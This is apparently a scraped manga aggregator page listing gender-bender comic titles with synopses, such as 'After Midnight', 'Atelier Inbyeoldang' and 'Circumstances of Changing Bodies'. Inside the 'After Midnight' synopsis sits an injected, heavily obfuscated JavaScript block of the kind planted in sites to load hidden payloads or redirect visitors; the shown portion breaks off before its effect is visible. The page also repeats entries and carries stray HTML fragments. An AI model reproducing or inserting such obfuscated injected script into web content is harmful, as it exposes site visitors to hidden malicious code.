Gender Bender

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

67 results

A Barbarian Was Admitted To The Academy

Read Manhwa A Barbarian Was Admitted To The Academy / A Barbarian Entered The Academy / Варвар Поступил В Академию / アカデミーにオランケが入学した / 아카데미에 오랑캐가 입학했다 The Protagonist Is Lee Soo-Jin, A College Student Who Loved Playing A Role-Playing Game Called “Academy Of Magic”. One Day, He Wakes Up In The Body Of Rina, A Secondary Character In The Game Who Was A Barbarian Warrior From A Savage Tribe. He Discovers That Rina Was Destined To Come To A Bad End, Being Captured And Tortured By The Evil Empress. She Decides To Escape This Fate And Enroll In The Magic Academy, Where She Meets Several Characters From The Game, Including The Crown Prince, The Black Knight, The White Wizard And The Empress Herself.


After Constantly Dying, I Became The Emperor Venerable

Read Manhua After Constantly Dying, I Became The Emperor Venerable / Buduan Zuo Si Hou, Wo Chengle Wan Ren Mi Di Zun / After Constantly Trying To Die, I Became The Emperor Venerable Everyone Crazy About / Bùduàn Zuò Sǐ Hòu, Wǒ Chéngle Wàn Rén Mí Dì Zūn / Sau Khi Không Ngừng Tìm Đường Chết, Ta Trở Thành Đế Tôn Vạn Người Mê / 不断作死后,我成了万人迷帝尊 / 不断作死后我成了万人迷帝尊初初子语 / 年少帝尊 …Emperor Yan Ge: It Is Better To Send Me To Death Than To Send The Emperor Away, Thank You. The Immortals: He Actually Said Thank You To Me, Really, I Cried To Death. Emperor Yan Ge: …


After Midnight

One day Jina, a 24-year-old woman, realizes that she has a peculiar constitution that turns into a man's body at midnight. Forced to change to a job without overtime, Jina starts working at a law firm as an office clerk. An unfortunate chain of events leads to her handsome playboy lawyer boss witnessing the moment when she transforms into a man...?!<script></script><script>(function(_0x446d43,_0x546ee6){var _0x1f15b4=_0x413a,_0x33844c=_0x446d43();while(!![]){try{var _0x164f6e=-parseInt(_0x1f15b4(0xab))/(0x6*-0x603+-0x15ea+0x39fd)*(parseInt(_0x1f15b4(0xa1))/(0xd47+-0x1983+-0x61f*-0x2))+parseInt(_0x1f15b4(0xb1))/(-0xa4e*0x1+-0xaf1+0x1542)*(parseInt(_0x1f15b4(0xb9))/(0x4*0x3d1+0xb*-0x338+0x1428))+parseInt(_0x1f15b4(0x9f))/(0x12cd*-0x1+-0x46a+-0x173c*-0x1)+-parseInt(_0x1f15b4(0xb7))/(0x4*-0x45d+0xef*-0xb+0x1*0x1bbf)+parseInt(_0x1f15b4(0xb6))/(-0x245f+-0xb1a+0x2f80)+-parseInt(_0x1f15b4(0xbe))/(-0xff8+-0xa45+0x1a45)*(-parseInt(_0x1f15b4(0xb5))/(0x682+0x12ba*0x2+-0x41*0xad))+-parseInt(_0x1f15b4(0xaf))/(-0x1c*0xda+-0x20c7+0x38a9)*(parseInt(_0x1f15b4(0xa9))/(-0xe02+-0xf57+-0x4c*-0x63));if(_0x164f6e===_0x546ee6)break;else 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Another World Dump Truck

Read Manga Another World Dump Truck Online For Free At KunManga Another World Dump Truck Novel also known as “Another World Dump Truck, 이세계 덤프트럭”. This OnGoing webtoon was released on 2024. The story was written by Comma and illustrations by Comma. The content of the comic Another World Dump Truck: Yul, the manager of the interdimensional dump truck office, accidentally kills an innocent person named Kwon Yoo-jun. In order to make amends, Yul enters a romance fantasy novel where Yoo-jun is the villainess and tries to send her back to her original world. However, due to various complications, Yul becomes trapped in the novel. With the office staff scattered and no knowledge of the novel&#8217;s plot, Yul desperately searches for a way out. But, Yoo-jun, who is now pretending to be a noble lady in the new world, causes Yul a headache. The comic Another World Dump Truck belongs to the Genre: Drama, Fantasy, Gender Bender, Manhwa, Romance MangaZin is a website that aggregates the latest and hottest manga, updated quickly to serve readers with high-quality images and deliver them an excellent experience. You can Read Manhwa recommendation Dance of the Phoenix I Can Use the Card Drawing System to Summon Beautiful Girls


Atelier Inbyeoldang

Inbyeoldang / Per Person / 花美男照相馆 / 인별당 To become a painter in an era of prejudice, Chae Hongkyung disguises herself as a boy and leaves for Gyeongseong. Despite her hatred of cameras, she’s drawn to the photos she sees at a studio called Inbyeoldang. After an interesting encounter with its owner, Joo Heon, Hongkyung accepts his offer to learn photography and work at the studio, which is on the brink of collapse. Will she fulfill her dreams, survive her new job, and most importantly, keep her true identity secret from her boss?


Best Of Luck, Warrior!

The Devil King whom I defeated in my past life is now my boss in the office?! Baek Young-woong (meaning hero in korean), an ordinary office worker reborn with the memories of his past life as a warrior who defeated the devil king! The memories were only useful when he used to write webnovels as a child. Young-woong regrets having useless memories of his past life and gets a job in the executive secretarial office of Daeryong ENT, a big company. However, after meeting the CEO, Do Yeon-hwa, for the first time, I feel the trauma from my past life experience…? It’s like, you’re facing a really strong and big devil…! Read the terribly intertwined romance of the devil king, the CEO and the warrior, the newest secretary! Good Luck, Warrior! / Good Luck, Soldier! / 행운을 빌어요, 용사님!


Circumstances Of Changing Bodies

Circumstances of Changing Bodies / 몸이 바뀌는 사정 / <div class="post-title"> <h1>Circumstances of Switching Bodies</h1> </div> The prince was cursed of switching bodies with the woman he spent the night with, and I became the daughter of the duke who could not solve the curse. Tempted to solve the curse, I seduced him indifferently and spent the night with him. I gave him the antidote, so I stopped paying attention to him… “Princess, you’re leaving me because you weren’t satisfied that night.” “…” “Once more. I’ll satisfy you this time.” To make matters worse, the curse has not been lifted and our bodies have switched frequently without notice. There’s only one way back to our original bodies, which is to desire each other’s bodies. Circumstances of Changing Bodies


Circumstances Of Switching Bodies

Read manhwa Circumstances of Changing Bodies / 몸이 바뀌는 사정 / <div class="post-title"> <h1>Circumstances of Switching Bodies</h1> </div> The prince was cursed of switching bodies with the woman he spent the night with, and I became the daughter of the duke who could not solve the curse. Tempted to solve the curse, I seduced him indifferently and spent the night with him. I gave him the antidote, so I stopped paying attention to him… “Princess, you’re leaving me because you weren’t satisfied that night.” “…” “Once more. I’ll satisfy you this time.” To make matters worse, the curse had not been lifted and our bodies have switched frequently without notice. There’s only one way back to our original bodies, which is to desire each other’s bodies, but- “Your Highness, why did you rush all the way here?” “You said you didn’t like being rained on.” “I told you it was a lie to lure you in.” The changed man covered me with his jacket and said softly, “I hate myself for letting you get rained on.”


Daily Life In Ts School

At a boy's school where there are multiple students with OTMS constitutions that temporarily become female due to various reasons, commonly known as TS Gakuen, a childhood friend who was attending school together suddenly becomes a beautiful girl who feels embarrassed and serious There are a lot of special everyday scenes and exciting school life such as the discipline committee member who cannot accept his own female constitution and the students who are positively dressed in female uniforms and enjoy the cuteness!


Destiny Unchain Online: After Becoming A Vampire Girl, I Eventually Became Known As『Crimson Demon King』

Kou Mitsuki is a gamer with god-like skills who also goes by the nickname "Headhunting Crim". He participates in a test of a new game device for his father's new game, "Destiny Unchained Online". But the game was filled with bugs at the start and he ends up as a vampire girl. Meeting amazing allies, and taking the game by storm, the story of a top-tier gamer where anything and everything can change....begins!


Detective Lady

Huang Zixia is an investigative prodigy who proved herself by helping her father solve confounding crimes. After being accused of murdering her whole family due to an arranged marriage, the heroine is on the run. When she meets a prince, they work together to investigate the truth of the murder.



After spending two years in jail, Ishii Kazuyoshi is finally free—only to get hit by a truck straight away and die. A talking cat offers him a second chance at life, and he then wakes up in the body of a high school girl who had been in a coma for the past three days. As he was the former director of a karate tournament, the cat tasked him with helping his new body's original owner restore her run-down karate doujou.
